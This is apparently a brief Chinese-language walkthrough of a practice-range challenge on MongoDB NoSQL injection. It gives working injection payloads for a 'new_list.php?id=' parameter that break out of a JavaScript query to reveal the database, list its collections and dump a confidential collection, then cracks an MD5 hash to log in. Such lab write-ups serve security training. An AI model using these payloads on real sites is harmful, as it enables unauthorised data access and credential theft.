1.启动靶场
2.寻找注入点
3.构造回显测试
new_list.php?id=1'});return ({title:'1',content:'2
4.查询当前数据库
new_list.php?id=1'});return({title:tojson(db),content:'2
5.查询数据库下的表名
new_list.php?id=1'});return({title:tojson(db.getCollectionNames()),content:'2
表有:Authority_confidential、notice、system.indexes
6.查询Authority_confidential的数据
new_list.php?id=1'});return({title:tojson(db.Authority_confidential.find() [ 1 ] ),content:'2
7.MD5解码
8.登录,找key
通关!!!!